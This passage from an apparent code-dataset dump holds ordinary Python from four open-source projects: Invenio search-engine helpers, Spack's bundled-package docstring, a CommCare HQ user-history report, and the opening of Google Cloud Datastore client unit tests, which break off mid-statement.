if coll not in colls_to_search:
colls_to_search.append(coll)
# we have been asked to return list of recIDs
recIDs = list(results_final_for_all_selected_colls)
if rm: # do we have to rank?
results_final_for_all_colls_rank_records_output = rank_records(req, rm, 0, results_final_for_all_selected_colls,
string.split(p) + string.split(p1) +
string.split(p2) + string.split(p3), verbose, so, of, field=kwargs['f'])
if results_final_for_all_colls_rank_records_output[0]:
recIDs = results_final_for_all_colls_rank_records_output[0]
elif sf or (CFG_BIBSORT_BUCKETS and sorting_methods): # do we have to sort?
recIDs = sort_records(req, recIDs, sf, so, sp, verbose, of)
return recIDs
def perform_request_cache(req, action="show"):
"""Manipulates the search engine cache."""
req.content_type = "text/html"
req.send_http_header()
req.write("<html>")
out = ""
out += "<h1>Search Cache</h1>"
req.write(out)
# show collection reclist cache:
out = "<h3>Collection reclist cache</h3>"
out += "- collection table last updated: %s" % get_table_update_time('collection')
out += "<br />- reclist cache timestamp: %s" % collection_reclist_cache.timestamp
out += "<br />- reclist cache contents:"
out += "<blockquote>"
for coll in collection_reclist_cache.cache.keys():
if collection_reclist_cache.cache[coll]:
out += "%s (%d)<br />" % (coll, len(collection_reclist_cache.cache[coll]))
out += "</blockquote>"
req.write(out)
# show field i18nname cache:
out = "<h3>Field I18N names cache</h3>"
out += "- fieldname table last updated: %s" % get_table_update_time('fieldname')
out += "<br />- i18nname cache timestamp: %s" % field_i18nname_cache.timestamp
out += "<br />- i18nname cache contents:"
out += "<blockquote>"
for field in field_i18nname_cache.cache.keys():
for ln in field_i18nname_cache.cache[field].keys():
out += "%s, %s = %s<br />" % (field, ln, field_i18nname_cache.cache[field][ln])
out += "</blockquote>"
req.write(out)
# show collection i18nname cache:
out = "<h3>Collection I18N names cache</h3>"
out += "- collectionname table last updated: %s" % get_table_update_time('collectionname')
out += "<br />- i18nname cache timestamp: %s" % collection_i18nname_cache.timestamp
out += "<br />- i18nname cache contents:"
out += "<blockquote>"
for coll in collection_i18nname_cache.cache.keys():
for ln in collection_i18nname_cache.cache[coll].keys():
out += "%s, %s = %s<br />" % (coll, ln, collection_i18nname_cache.cache[coll][ln])
out += "</blockquote>"
req.write(out)
req.write("</html>")
return "\n"
def perform_request_log(req, date=""):
"""Display search log information for given date."""
req.content_type = "text/html"
req.send_http_header()
req.write("<html>")
req.write("<h1>Search Log</h1>")
if date: # case A: display stats for a day
yyyymmdd = string.atoi(date)
req.write("<p><big><strong>Date: %d</strong></big><p>" % yyyymmdd)
req.write("""<table border="1">""")
req.write("<tr><td><strong>%s</strong></td><td><strong>%s</strong></td><td><strong>%s</strong></td><td><strong>%s</strong></td><td><strong>%s</strong></td><td><strong>%s</strong></td></tr>" % ("No.", "Time", "Pattern", "Field", "Collection", "Number of Hits"))
# read file:
p = os.popen("grep ^%d %s/search.log" % (yyyymmdd, CFG_LOGDIR), 'r')
lines = p.readlines()
p.close()
# process lines:
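        # each log line is expected to look like
        # "YYYYMMDDHHMMSS#aas#pattern#field#collection#nbhits"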
i = 0
for line in lines:
try:
datetime, dummy_aas, p, f, c, nbhits = string.split(line,"#")
i += 1
req.write("<tr><td align=\"right\">#%d</td><td>%s:%s:%s</td><td>%s</td><td>%s</td><td>%s</td><td>%s</td></tr>" \
% (i, datetime[8:10], datetime[10:12], datetime[12:], p, f, c, nbhits))
except:
                pass # ignore any malformed log lines
req.write("</table>")
else: # case B: display summary stats per day
yyyymm01 = int(time.strftime("%Y%m01", time.localtime()))
yyyymmdd = int(time.strftime("%Y%m%d", time.localtime()))
req.write("""<table border="1">""")
req.write("<tr><td><strong>%s</strong></td><td><strong>%s</strong></tr>" % ("Day", "Number of Queries"))
for day in range(yyyymm01, yyyymmdd + 1):
p = os.popen("grep -c ^%d %s/search.log" % (day, CFG_LOGDIR), 'r')
for line in p.readlines():
req.write("""<tr><td>%s</td><td align="right"><a href="%s/search/log?date=%d">%s</a></td></tr>""" % \
(day, CFG_SITE_URL, day, line))
p.close()
req.write("</table>")
req.write("</html>")
return "\n"
def get_all_field_values(tag):
"""
Return all existing values stored for a given tag.
@param tag: the full tag, e.g. 909C0b
@type tag: string
@return: the list of values
@rtype: list of strings
"""
table = 'bib%02dx' % int(tag[:2])
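    # e.g. tag '909C0b' is looked up in table 'bib90x'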
return [row[0] for row in run_sql("SELECT DISTINCT(value) FROM %s WHERE tag=%%s" % table, (tag, ))]
def get_most_popular_field_values(recids, tags, exclude_values=None, count_repetitive_values=True, split_by=0):
"""
Analyze RECIDS and look for TAGS and return most popular values
and the frequency with which they occur sorted according to
descending frequency.
If a value is found in EXCLUDE_VALUES, then do not count it.
If COUNT_REPETITIVE_VALUES is True, then we count every occurrence
of value in the tags. If False, then we count the value only once
regardless of the number of times it may appear in a record.
(But, if the same value occurs in another record, we count it, of
course.)
@return: list of tuples containing tag and its frequency
Example:
>>> get_most_popular_field_values(range(11,20), '980__a')
[('PREPRINT', 10), ('THESIS', 7), ...]
>>> get_most_popular_field_values(range(11,20), ('100__a', '700__a'))
[('Ellis, J', 10), ('Ellis, N', 7), ...]
>>> get_most_popular_field_values(range(11,20), ('100__a', '700__a'), ('Ellis, J'))
[('Ellis, N', 7), ...]
"""
def _get_most_popular_field_values_helper_sorter(val1, val2):
"""Compare VAL1 and VAL2 according to, firstly, frequency, then
secondly, alphabetically."""
compared_via_frequencies = cmp(valuefreqdict[val2],
valuefreqdict[val1])
if compared_via_frequencies == 0:
return cmp(val1.lower(), val2.lower())
else:
return compared_via_frequencies
valuefreqdict = {}
## sanity check:
if not exclude_values:
exclude_values = []
if isinstance(tags, str):
tags = (tags,)
## find values to count:
vals_to_count = []
displaytmp = {}
if count_repetitive_values:
# counting technique A: can look up many records at once: (very fast)
for tag in tags:
vals_to_count.extend(get_fieldvalues(recids, tag, sort=False,
split_by=split_by))
else:
# counting technique B: must count record-by-record: (slow)
for recid in recids:
vals_in_rec = []
for tag in tags:
for val in get_fieldvalues(recid, tag, False):
vals_in_rec.append(val)
# do not count repetitive values within this record
# (even across various tags, so need to unify again):
dtmp = {}
for val in vals_in_rec:
dtmp[val.lower()] = 1
displaytmp[val.lower()] = val
vals_in_rec = dtmp.keys()
vals_to_count.extend(vals_in_rec)
## are we to exclude some of found values?
for val in vals_to_count:
if val not in exclude_values:
if val in valuefreqdict:
valuefreqdict[val] += 1
else:
valuefreqdict[val] = 1
## sort by descending frequency of values:
if not CFG_NUMPY_IMPORTABLE:
## original version
out = []
vals = valuefreqdict.keys()
vals.sort(_get_most_popular_field_values_helper_sorter)
for val in vals:
tmpdisplv = ''
if val in displaytmp:
tmpdisplv = displaytmp[val]
else:
tmpdisplv = val
out.append((tmpdisplv, valuefreqdict[val]))
return out
else:
f = [] # frequencies
n = [] # original names
ln = [] # lowercased names
## build lists within one iteration
for (val, freq) in valuefreqdict.iteritems():
f.append(-1 * freq)
if val in displaytmp:
n.append(displaytmp[val])
else:
n.append(val)
ln.append(val.lower())
## sort by frequency (desc) and then by lowercased name.
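        ## (numpy.lexsort uses the *last* key as the primary sort key, so the negated
        ## frequencies in f dominate and the lowercased names in ln break ties)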
return [(n[i], -1 * f[i]) for i in numpy.lexsort([ln, f])]
def profile(p="", f="", c=CFG_SITE_NAME):
"""Profile search time."""
import profile
import pstats
profile.run("perform_request_search(p='%s',f='%s', c='%s')" % (p, f, c), "perform_request_search_profile")
p = pstats.Stats("perform_request_search_profile")
p.strip_dirs().sort_stats("cumulative").print_stats()
return 0
def perform_external_collection_search_with_em(req, current_collection, pattern_list, field,
external_collection, verbosity_level=0, lang=CFG_SITE_LANG,
selected_external_collections_infos=None, em=""):
perform_external_collection_search(req, current_collection, pattern_list, field, external_collection,
verbosity_level, lang, selected_external_collections_infos,
print_overview=em == "" or EM_REPOSITORY["overview"] in em,
print_search_info=em == "" or EM_REPOSITORY["search_info"] in em,
print_see_also_box=em == "" or EM_REPOSITORY["see_also_box"] in em,
print_body=em == "" or EM_REPOSITORY["body"] in em)
| EUDAT-B2SHARE/invenio-old | modules/websearch/lib/search_engine.py | Python | gpl-2.0 | 314,285 | 0.007118 |
##############################################################################
# Copyright (c) 2013-2017, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, tgamblin@llnl.gov, All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/llnl/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
"""
This module contains external, potentially separately licensed,
packages that are included in spack.
So far:
argparse: We include our own version to be Python 2.6 compatible.
distro: Provides a more stable linux distribution detection.
functools: Used for implementation of total_ordering.
jinja2: A modern and designer-friendly templating language for Python
jsonschema: An implementation of JSON Schema for Python.
ordereddict: We include our own version to be Python 2.6 compatible.
py: Needed by pytest. Library with cross-python path,
ini-parsing, io, code, and log facilities.
pyqver2: External script to query required python version of
python source code. Used for ensuring 2.6 compatibility.
pytest: Testing framework used by Spack.
yaml: Used for config files.
"""
| TheTimmy/spack | lib/spack/external/__init__.py | Python | lgpl-2.1 | 2,139 | 0 |
from django.core.exceptions import ObjectDoesNotExist
from django.db.models import Q
from django.template.loader import render_to_string
from django.utils.html import format_html
from django.utils.safestring import mark_safe
from django.utils.translation import ugettext as _
from django.utils.translation import ugettext_lazy
from memoized import memoized
from corehq import privileges
from corehq.apps.accounting.models import BillingAccount
from corehq.apps.accounting.utils import domain_has_privilege
from corehq.apps.reports.datatables import DataTablesColumn, DataTablesHeader
from corehq.apps.reports.dispatcher import UserManagementReportDispatcher
from corehq.apps.reports.filters.users import (
ChangeActionFilter,
ChangedByUserFilter,
EnterpriseUserFilter,
)
from corehq.apps.reports.filters.users import \
ExpandedMobileWorkerFilter as EMWF
from corehq.apps.reports.generic import GenericTabularReport, GetParamsMixin, PaginatedReportMixin
from corehq.apps.reports.standard import DatespanMixin, ProjectReport
from corehq.apps.users.audit.change_messages import (
ASSIGNED_LOCATIONS_FIELD,
CHANGE_MESSAGES_FIELDS,
DOMAIN_FIELD,
LOCATION_FIELD,
PHONE_NUMBERS_FIELD,
ROLE_FIELD,
TWO_FACTOR_FIELD,
get_messages,
)
from corehq.apps.users.models import UserHistory
from corehq.const import USER_DATETIME_FORMAT
from corehq.util.timezones.conversions import ServerTime
class UserHistoryReport(GetParamsMixin, DatespanMixin, GenericTabularReport, ProjectReport, PaginatedReportMixin):
slug = 'user_history'
name = ugettext_lazy("User History")
section_name = ugettext_lazy("User Management")
dispatcher = UserManagementReportDispatcher
fields = [
'corehq.apps.reports.filters.users.AffectedUserFilter',
'corehq.apps.reports.filters.users.ChangedByUserFilter',
'corehq.apps.reports.filters.dates.DatespanFilter',
'corehq.apps.reports.filters.users.ChangeActionFilter',
'corehq.apps.reports.filters.users.UserPropertyFilter',
'corehq.apps.reports.filters.users.UserUploadRecordFilter',
]
description = ugettext_lazy("History of user updates")
ajax_pagination = True
default_sort = {'changed_at': 'desc'}
@classmethod
def get_primary_properties(cls, domain):
"""
Get slugs and human-friendly names for the properties that are available
for filtering and/or displayed by default in the report, without
needing to click "See More".
"""
if domain_has_privilege(domain, privileges.APP_USER_PROFILES):
user_data_label = _("profile or user data")
else:
user_data_label = _("user data")
return {
"username": _("username"),
ROLE_FIELD: _("role"),
"email": _("email"),
DOMAIN_FIELD: _("project"),
"is_active": _("is active"),
"language": _("language"),
PHONE_NUMBERS_FIELD: _("phone numbers"),
LOCATION_FIELD: _("primary location"),
"user_data": user_data_label,
TWO_FACTOR_FIELD: _("two factor authentication disabled"),
ASSIGNED_LOCATIONS_FIELD: _("assigned locations"),
}
@property
def headers(self):
h = [
DataTablesColumn(_("Affected User"), sortable=False),
DataTablesColumn(_("Modified by User"), sortable=False),
DataTablesColumn(_("Action"), prop_name='action'),
DataTablesColumn(_("Via"), prop_name='changed_via'),
DataTablesColumn(_("Changes"), sortable=False),
DataTablesColumn(_("Change Message"), sortable=False),
DataTablesColumn(_("Timestamp"), prop_name='changed_at'),
]
return DataTablesHeader(*h)
@property
def total_records(self):
return self._get_queryset().count()
@memoized
def _get_queryset(self):
user_slugs = self.request.GET.getlist(EMWF.slug)
user_ids = self._get_user_ids(user_slugs)
# return empty queryset if no matching users were found
if user_slugs and not user_ids:
return UserHistory.objects.none()
changed_by_user_slugs = self.request.GET.getlist(ChangedByUserFilter.slug)
changed_by_user_ids = self._get_user_ids(changed_by_user_slugs)
# return empty queryset if no matching users were found
if changed_by_user_slugs and not changed_by_user_ids:
return UserHistory.objects.none()
user_property = self.request.GET.get('user_property')
actions = self.request.GET.getlist('action')
user_upload_record_id = self.request.GET.get('user_upload_record')
query = self._build_query(user_ids, changed_by_user_ids, user_property, actions, user_upload_record_id)
return query
def _get_user_ids(self, slugs):
es_query = self._get_users_es_query(slugs)
return es_query.values_list('_id', flat=True)
def _get_users_es_query(self, slugs):
return EnterpriseUserFilter.user_es_query(
self.domain,
slugs,
self.request.couch_user,
)
def _build_query(self, user_ids, changed_by_user_ids, user_property, actions, user_upload_record_id):
filters = Q(for_domain__in=self._for_domains())
if user_ids:
filters = filters & Q(user_id__in=user_ids)
if changed_by_user_ids:
filters = filters & Q(changed_by__in=changed_by_user_ids)
if user_property:
filters = filters & self._get_property_filters(user_property)
if actions and ChangeActionFilter.ALL not in actions:
filters = filters & Q(action__in=actions)
if user_upload_record_id:
filters = filters & Q(user_upload_record_id=user_upload_record_id)
if self.datespan:
filters = filters & Q(changed_at__lt=self.datespan.enddate_adjusted,
changed_at__gte=self.datespan.startdate)
return UserHistory.objects.filter(filters)
def _for_domains(self):
return BillingAccount.get_account_by_domain(self.domain).get_domains()
@staticmethod
def _get_property_filters(user_property):
if user_property in CHANGE_MESSAGES_FIELDS:
query_filters = Q(change_messages__has_key=user_property)
# to include CommCareUser creation from UI where a location can be assigned as a part of user creation
# which is tracked only under "changes" and not "change messages"
if user_property == LOCATION_FIELD:
query_filters = query_filters | Q(changes__has_key='location_id')
else:
query_filters = Q(changes__has_key=user_property)
return query_filters
@property
def rows(self):
records = self._get_queryset().order_by(self.ordering)[
self.pagination.start:self.pagination.start + self.pagination.count
]
for record in records:
yield self._user_history_row(record, self.domain, self.timezone)
@property
def ordering(self):
by, direction = list(self.get_sorting_block()[0].items())[0]
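        # e.g. the default sort {'changed_at': 'desc'} yields '-changed_at' for order_by()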
return '-' + by if direction == 'desc' else by
@memoized
def _get_location_name(self, location_id):
from corehq.apps.locations.models import SQLLocation
if not location_id:
return None
try:
location_object = SQLLocation.objects.get(location_id=location_id)
except ObjectDoesNotExist:
return None
return location_object.display_name
def _user_history_row(self, record, domain, timezone):
return [
record.user_repr,
record.changed_by_repr,
_get_action_display(record.action),
record.changed_via,
self._user_history_details_cell(record.changes, domain),
self._html_list(list(get_messages(record.change_messages))),
ServerTime(record.changed_at).user_time(timezone).ui_string(USER_DATETIME_FORMAT),
]
def _html_list(self, changes):
items = []
if isinstance(changes, dict):
for key, value in changes.items():
if isinstance(value, dict):
value = self._html_list(value)
elif isinstance(value, list):
value = format_html(", ".join(value))
else:
value = format_html(str(value))
items.append("<li>{}: {}</li>".format(key, value))
elif isinstance(changes, list):
items = ["<li>{}</li>".format(format_html(change)) for change in changes]
return mark_safe(f"<ul class='list-unstyled'>{''.join(items)}</ul>")
def _user_history_details_cell(self, changes, domain):
properties = UserHistoryReport.get_primary_properties(domain)
properties.pop("user_data", None)
primary_changes = {}
all_changes = {}
for key, value in changes.items():
if key == 'location_id':
value = self._get_location_name(value)
primary_changes[properties[LOCATION_FIELD]] = value
all_changes[properties[LOCATION_FIELD]] = value
elif key == 'user_data':
for user_data_key, user_data_value in changes['user_data'].items():
all_changes[f"user data: {user_data_key}"] = user_data_value
elif key in properties:
primary_changes[properties[key]] = value
all_changes[properties[key]] = value
more_count = len(all_changes) - len(primary_changes)
return render_to_string("reports/standard/partials/user_history_changes.html", {
"primary_changes": self._html_list(primary_changes),
"all_changes": self._html_list(all_changes),
"more_count": more_count,
})
def _get_action_display(logged_action):
action = ugettext_lazy("Updated")
if logged_action == UserHistory.CREATE:
action = ugettext_lazy("Added")
elif logged_action == UserHistory.DELETE:
action = ugettext_lazy("Deleted")
return action
| dimagi/commcare-hq | corehq/apps/reports/standard/users/reports.py | Python | bsd-3-clause | 10,221 | 0.00137 |
# Copyright 2014 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
import mock
def _make_credentials():
import google.auth.credentials
return mock.Mock(spec=google.auth.credentials.Credentials)
def _make_entity_pb(project, kind, integer_id, name=None, str_val=None):
from google.cloud.datastore_v1.proto import entity_pb2
from google.cloud.datastore.helpers import _new_value_pb
entity_pb = entity_pb2.Entity()
entity_pb.key.partition_id.project_id = project
path_element = entity_pb.key.path.add()
path_element.kind = kind
path_element.id = integer_id
if name is not None and str_val is not None:
value_pb = _new_value_pb(entity_pb, name)
value_pb.string_value = str_val
return entity_pb
class Test__get_gcd_project(unittest.TestCase):
def _call_fut(self):
from google.cloud.datastore.client import _get_gcd_project
return _get_gcd_project()
def test_no_value(self):
environ = {}
with mock.patch("os.getenv", new=environ.get):
project = self._call_fut()
self.assertIsNone(project)
def test_value_set(self):
from google.cloud.datastore.client import GCD_DATASET
MOCK_PROJECT = object()
environ = {GCD_DATASET: MOCK_PROJECT}
with mock.patch("os.getenv", new=environ.get):
project = self._call_fut()
self.assertEqual(project, MOCK_PROJECT)
class Test__determine_default_project(unittest.TestCase):
def _call_fut(self, project=None):
from google.cloud.datastore.client import _determine_default_project
return _determine_default_project(project=project)
def _determine_default_helper(self, gcd=None, fallback=None, project_called=None):
_callers = []
def gcd_mock():
_callers.append("gcd_mock")
return gcd
def fallback_mock(project=None):
_callers.append(("fallback_mock", project))
return fallback
patch = mock.patch.multiple(
"google.cloud.datastore.client",
_get_gcd_project=gcd_mock,
_base_default_project=fallback_mock,
)
with patch:
returned_project = self._call_fut(project_called)
return returned_project, _callers
def test_no_value(self):
project, callers = self._determine_default_helper()
self.assertIsNone(project)
self.assertEqual(callers, ["gcd_mock", ("fallback_mock", None)])
def test_explicit(self):
PROJECT = object()
project, callers = self._determine_default_helper(project_called=PROJECT)
self.assertEqual(project, PROJECT)
self.assertEqual(callers, [])
def test_gcd(self):
PROJECT = object()
project, callers = self._determine_default_helper(gcd=PROJECT)
self.assertEqual(project, PROJECT)
self.assertEqual(callers, ["gcd_mock"])
def test_fallback(self):
PROJECT = object()
project, callers = self._determine_default_helper(fallback=PROJECT)
self.assertEqual(project, PROJECT)
self.assertEqual(callers, ["gcd_mock", ("fallback_mock", None)])
class TestClient(unittest.TestCase):
PROJECT = "PROJECT"
@staticmethod
def _get_target_class():
from google.cloud.datastore.client import Client
return Client
def _make_one(
self,
project=PROJECT,
namespace=None,
credentials=None,
client_info=None,
client_options=None,
_http=None,
_use_grpc=None,
):
return self._get_target_class()(
project=project,
namespace=namespace,
credentials=credentials,
client_info=client_info,
client_options=client_options,
_http=_http,
_use_grpc=_use_grpc,
)
def test_constructor_w_project_no_environ(self):
# Some environments (e.g. AppVeyor CI) run in GCE, so
# this test would fail artificially.
patch = mock.patch(
"google.cloud.datastore.client._base_default_project", return_value=None
)
with patch:
self.assertRaises(EnvironmentError, self._make_one, None)
def test_constructor_w_implicit_inputs(self):
from google.cloud.datastore.client import _CLIENT_INFO
from google.cloud.datastore.client import _DATASTORE_BASE_URL
other = "other"
creds = _make_credentials()
klass = self._get_target_class()
patch1 = mock.patch(
"google.cloud.datastore.client._determine_default_project",
return_value=other,
)
patch2 = mock.patch("google.auth.default", return_value=(creds, None))
with patch1 as _determine_default_project:
with patch2 as default:
client = klass()
self.assertEqual(client.project, other)
self.assertIsNone(client.namespace)
self.assertIs(client._credentials, creds)
self.assertIs(client._client_info, _CLIENT_INFO)
self.assertIsNone(client._http_internal)
self.assertIsNone(client._client_options)
self.assertEqual(client.base_url, _DATASTORE_BASE_URL)
self.assertIsNone(client.current_batch)
self.assertIsNone(client.current_transaction)
default.assert_called_once_with()
_determine_default_project.assert_called_once_with(None)
def test_constructor_w_explicit_inputs(self):
from google.api_core.client_options import ClientOptions
other = "other"
namespace = "namespace"
creds = _make_credentials()
client_info = mock.Mock()
client_options = ClientOptions("endpoint")
http = object()
client = self._make_one(
project=other,
namespace=namespace,
credentials=creds,
client_info=client_info,
client_options=client_options,
_http=http,
)
self.assertEqual(client.project, other)
self.assertEqual(client.namespace, namespace)
self.assertIs(client._credentials, creds)
self.assertIs(client._client_info, client_info)
self.assertIs(client._http_internal, http)
self.assertIsNone(client.current_batch)
self.assertIs(client._base_url, "endpoint")
self.assertEqual(list(client._batch_stack), [])
def test_constructor_use_grpc_default(self):
import google.cloud.datastore.client as MUT
project = "PROJECT"
creds = _make_credentials()
http = object()
with mock.patch.object(MUT, "_USE_GRPC", new=True):
client1 = self._make_one(project=project, credentials=creds, _http=http)
self.assertTrue(client1._use_grpc)
# Explicitly over-ride the environment.
client2 = self._make_one(
project=project, credentials=creds, _http=http, _use_grpc=False
)
self.assertFalse(client2._use_grpc)
with mock.patch.object(MUT, "_USE_GRPC", new=False):
client3 = self._make_one(project=project, credentials=creds, _http=http)
self.assertFalse(client3._use_grpc)
# Explicitly over-ride the environment.
client4 = self._make_one(
project=project, credentials=creds, _http=http, _use_grpc=True
)
self.assertTrue(client4._use_grpc)
def test_constructor_gcd_host(self):
from google.cloud.environment_vars import GCD_HOST
host = "localhost:1234"
fake_environ = {GCD_HOST: host}
project = "PROJECT"
creds = _make_credentials()
http = object()
with mock.patch("os.environ", new=fake_environ):
client = self._make_one(project=project, credentials=creds, _http=http)
self.assertEqual(client.base_url, "http://" + host)
def test_base_url_property(self):
from google.cloud.datastore.client import _DATASTORE_BASE_URL
from google.api_core.client_options import ClientOptions
alternate_url = "https://alias.example.com/"
project = "PROJECT"
creds = _make_credentials()
http = object()
client_options = ClientOptions()
client = self._make_one(
project=project,
credentials=creds,
_http=http,
client_options=client_options,
)
self.assertEqual(client.base_url, _DATASTORE_BASE_URL)
client.base_url = alternate_url
self.assertEqual(client.base_url, alternate_url)
def test_base_url_property_w_client_options(self):
alternate_url = "https://alias.example.com/"
project = "PROJECT"
creds = _make_credentials()
http = object()
client_options = {"api_endpoint": "endpoint"}
client = self._make_one(
project=project,
credentials=creds,
_http=http,
client_options=client_options,
)
self.assertEqual(client.base_url, "endpoint")
client.base_url = alternate_url
self.assertEqual(client.base_url, alternate_url)
def test__datastore_api_property_already_set(self):
client = self._make_one(
project="prahj-ekt", credentials=_make_credentials(), _use_grpc=True
)
already = client._datastore_api_internal = object()
self.assertIs(client._datastore_api, already)
def test__datastore_api_property_gapic(self):
client_info = mock.Mock()
client = self._make_one(
project="prahj-ekt",
credentials=_make_credentials(),
client_info=client_info,
_http=object(),
_use_grpc=True,
)
self.assertIsNone(client._datastore_api_internal)
patch = mock.patch(
"google.cloud.datastore.client.make_datastore_api",
return_value=mock.sentinel.ds_api,
)
with patch as make_api:
ds_api = client._datastore_api
self.assertIs(ds_api, mock.sentinel.ds_api)
self.assertIs(client._datastore_api_internal, mock.sentinel.ds_api)
make_api.assert_called_once_with(client)
def test__datastore_api_property_http(self):
client_info = mock.Mock()
client = self._make_one(
project="prahj-ekt",
credentials=_make_credentials(),
client_info=client_info,
_http=object(),
_use_grpc=False,
)
self.assertIsNone(client._datastore_api_internal)
patch = mock.patch(
"google.cloud.datastore.client.HTTPDatastoreAPI",
return_value=mock.sentinel.ds_api,
)
with patch as make_api:
ds_api = client._datastore_api
self.assertIs(ds_api, mock.sentinel.ds_api)
self.assertIs(client._datastore_api_internal, mock.sentinel.ds_api)
make_api.assert_called_once_with(client)
def test__push_batch_and__pop_batch(self):
creds = _make_credentials()
client = self._make_one(credentials=creds)
batch = client.batch()
xact = client.transaction()
client._push_batch(batch)
self.assertEqual(list(client._batch_stack), [batch])
self.assertIs(client.current_batch, batch)
self.assertIsNone(client.current_transaction)
client._push_batch(xact)
self.assertIs(client.current_batch, xact)
self.assertIs(client.current_transaction, xact)
# list(_LocalStack) returns in reverse order.
self.assertEqual(list(client._batch_stack), [xact, batch])
self.assertIs(client._pop_batch(), xact)
self.assertEqual(list(client._batch_stack), [batch])
self.assertIs(client._pop_batch(), batch)
self.assertEqual(list(client._batch_stack), [])
def test_get_miss(self):
_called_with = []
def _get_multi(*args, **kw):
_called_with.append((args, kw))
return []
creds = _make_credentials()
client = self._make_one(credentials=creds)
client.get_multi = _get_multi
key = object()
self.assertIsNone(client.get(key))
self.assertEqual(_called_with[0][0], ())
self.assertEqual(_called_with[0][1]["keys"], [key])
self.assertIsNone(_called_with[0][1]["missing"])
self.assertIsNone(_called_with[0][1]["deferred"])
self.assertIsNone(_called_with[0][1]["transaction"])
def test_get_hit(self):
TXN_ID = "123"
_called_with = []
_entity = object()
def _get_multi(*args, **kw):
_called_with.append((args, kw))
return [_entity]
creds = _make_credentials()
client = self._make_one(credentials=creds)
client.get_multi = _get_multi
key, missing, deferred = object(), [], []
self.assertIs(client.get(key, missing, deferred, TXN_ID), _entity)
self.assertEqual(_called_with[0][0], ())
self.assertEqual(_called_with[0][1]["keys"], [key])
self.assertIs(_called_with[0][1]["missing"], missing)
self.assertIs(_called_with[0][1]["deferred"], deferred)
self.assertEqual(_called_with[0][1]["transaction"], TXN_ID)
def test_get_multi_no_keys(self):
creds = _make_credentials()
client = self._make_one(credentials=creds)
results = client.get_multi([])
self.assertEqual(results, [])
def test_get_multi_miss(self):
from google.cloud.datastore_v1.proto import datastore_pb2
from google.cloud.datastore.key import Key
creds = _make_credentials()
client = self._make_one(credentials=creds)
ds_api = _make_datastore_api()
client._datastore_api_internal = ds_api
key = Key("Kind", 1234, project=self.PROJECT)
results = client.get_multi([key])
self.assertEqual(results, [])
read_options = datastore_pb2.ReadOptions()
ds_api.lookup.assert_called_once_with(
self.PROJECT, [key.to_protobuf()], read_options=read_options
)
def test_get_multi_miss_w_missing(self):
from google.cloud.datastore_v1.proto import entity_pb2
from google.cloud.datastore_v1.proto import datastore_pb2
from google.cloud.datastore.key import Key
KIND = "Kind"
ID = 1234
# Make a missing entity pb to be returned from mock backend.
missed = entity_pb2.Entity()
missed.key.partition_id.project_id = self.PROJECT
path_element = missed.key.path.add()
path_element.kind = KIND
path_element.id = ID
creds = _make_credentials()
client = self._make_one(credentials=creds)
# Set missing entity on mock connection.
lookup_response = _make_lookup_response(missing=[missed])
ds_api = _make_datastore_api(lookup_response=lookup_response)
client._datastore_api_internal = ds_api
key = Key(KIND, ID, project=self.PROJECT)
missing = []
entities = client.get_multi([key], missing=missing)
self.assertEqual(entities, [])
key_pb = key.to_protobuf()
self.assertEqual([missed.key.to_protobuf() for missed in missing], [key_pb])
read_options = datastore_pb2.ReadOptions()
ds_api.lookup.assert_called_once_with(
self.PROJECT, [key_pb], read_options=read_options
)
def test_get_multi_w_missing_non_empty(self):
from google.cloud.datastore.key import Key
creds = _make_credentials()
client = self._make_one(credentials=creds)
key = Key("Kind", 1234, project=self.PROJECT)
missing = ["this", "list", "is", "not", "empty"]
self.assertRaises(ValueError, client.get_multi, [key], missing=missing)
def test_get_multi_w_deferred_non_empty(self):
from google.cloud.datastore.key import Key
creds = _make_credentials()
client = self._make_one(credentials=creds)
key = Key("Kind", 1234, project=self.PROJECT)
deferred = ["this", "list", "is", "not", "empty"]
self.assertRaises(ValueError, client.get_multi, [key], deferred=deferred)
def test_get_multi_miss_w_deferred(self):
from google.cloud.datastore_v1.proto import datastore_pb2
from google.cloud.datastore.key import Key
key = Key("Kind", 1234, project=self.PROJECT)
key_pb = key.to_protobuf()
# Set deferred entity on mock connection.
creds = _make_credentials()
client = self._make_one(credentials=creds)
lookup_response = _make_lookup_response(deferred=[key_pb])
ds_api = _make_datastore_api(lookup_response=lookup_response)
client._datastore_api_internal = ds_api
deferred = []
entities = client.get_multi([key], deferred=deferred)
self.assertEqual(entities, [])
self.assertEqual([def_key.to_protobuf() for def_key in deferred], [key_pb])
read_options = datastore_pb2.ReadOptions()
ds_api.lookup.assert_called_once_with(
self.PROJECT, [key_pb], read_options=read_options
)
def test_get_multi_w_deferred_from_backend_but_not_passed(self):
from google.cloud.datastore_v1.proto import datastore_pb2
from google.cloud.datastore_v1.proto import entity_pb2
from google.cloud.datastore.entity import Entity
from google.cloud.datastore.key import Key
key1 = Key("Kind", project=self.PROJECT)
key1_pb = key1.to_protobuf()
key2 = Key("Kind", 2345, project=self.PROJECT)
key2_pb = key2.to_protobuf()
entity1_pb = entity_pb2.Entity()
entity1_pb.key.CopyFrom(key1_pb)
entity2_pb = entity_pb2.Entity()
entity2_pb.key.CopyFrom(key2_pb)
creds = _make_credentials()
client = self._make_one(credentials=creds)
# Mock up two separate requests. Using an iterable as side_effect
# allows multiple return values.
lookup_response1 = _make_lookup_response(
results=[entity1_pb], deferred=[key2_pb]
)
lookup_response2 = _make_lookup_response(results=[entity2_pb])
ds_api = _make_datastore_api()
ds_api.lookup = mock.Mock(
